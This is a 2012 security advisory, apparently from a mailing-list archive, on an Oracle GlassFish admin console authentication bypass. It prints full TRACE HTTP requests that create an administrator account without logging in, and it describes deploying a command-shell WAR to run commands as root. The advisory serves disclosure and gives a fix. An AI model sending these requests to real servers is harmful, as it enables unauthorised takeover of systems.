[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

NGS00106 Technical Advisory: Increased exploitation of Oracle GlassFish Server Administration Console Remote Authentication Bypass Vulnerability



=======
Summary
=======
Name: Increased exploitation of Oracle GlassFish Server Administration Console 
Remote Authentication Bypass Vulnerability 
Release Date:  5 January 2012
Reference: NGS00106
Discoverer: David Spencer <david.spencer@xxxxxxxxxxxxx>
Vendor: Oracle
Vendor Reference: 
Systems Affected: Oracle GlassFish Server 2.1 and 3
Risk: High
Status: Published

========
TimeLine
========
Discovered: 26 August 2011
Released: 26 August 2011
Approved: 26 August 2011
Reported: 26 August 2011
Fixed: July 2011
Published:  5 January 2012

===========
Description
===========
Core security released a bug in Oracle GlassFish Server Administration Console 
on 5th May 2011 which can be found here:
http://www.securityfocus.com/archive/1/517965/30/0/threaded 
and here
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1511 

The rating of this issue is classified as medium due to it only returning 
sensitive information. A full fix has been released by Oracle.

NGS found that it is possible to use this issue to create a GlassFish 
administrator account as an unauthenticated user.

=================
Technical Details
=================
There is a known authentication bypass in Glassfish, by using a TRACE method 
rather than a GET method it is possible to access data meant only for Glassfish 
administrators.
The following requests were used to create a new Glassfish administrator:

TRACE 
/common/security/realms/manageUserNew.jsf?name=admin-realm&configName=server-config&bare=true
 HTTP/1.1
Host: 10.65.78.211:4848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) 
Gecko/20100101Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: 
http://10.65.78.211:4848/common/security/realms/manageUsers.jsf?name=admin-realm&configName=server-config&bare=true
Cookie: JSESSIONID=ada23501f36f1ec9148589e9a574

This then gave access to the create user page, however it is important that 
when the submit button is pressed the resultant POST request be converted to a 
TRACE request.

TRACE 
/common/security/realms/manageUserNew.jsf?propertyForm%3ApropertySheet%3ApropertSectionTextField%3AuserIdProp%3AUserId=NGSSecure&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnewPasswordProp%3ANewPassword=Password!!&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AconfirmPasswordProp%3AConfirmPassword=Password!!&propertyForm%3AhelpKey=ref-filerealmusernew.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=-2309913764624097582%3A-
2546877703812727807&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton&javax.faces.source=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton&javax.faces.partial.execute=%40all&javax.faces.partial.render=%40all&bare=true&propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton&javax.faces.partial.ajax=true
 HTTP/1.1
Host: 10.65.78.211:4848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) 
Gecko/20100101Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: 
http://10.65.78.211:4848/common/security/realms/manageUserNew.jsf?name=admin-realm&configName=server-config&;
Content-Length: 0
Cookie: JSESSIONID=ada23501f36f1ec9148589e9a574
Pragma: no-cache
Cache-Control: no-cache

This created a user called NGSSecure with a password of Password!!

NGS then logged on to the Glassfish administration console using this newly 
created user. Once logged on as this user it was possible to upload and deploy 
a website, NGS deployed cmd.war which allowed the user to run commands under 
the context of the GlassFish server which is root by default.

===============
Fix Information
===============
This issue has been fixed in GlassFish 3.1, a workaround also exists which is 
to disable the TRACE method on the administrator consoles web port

NGS Secure Research
http://www.ngssecure.com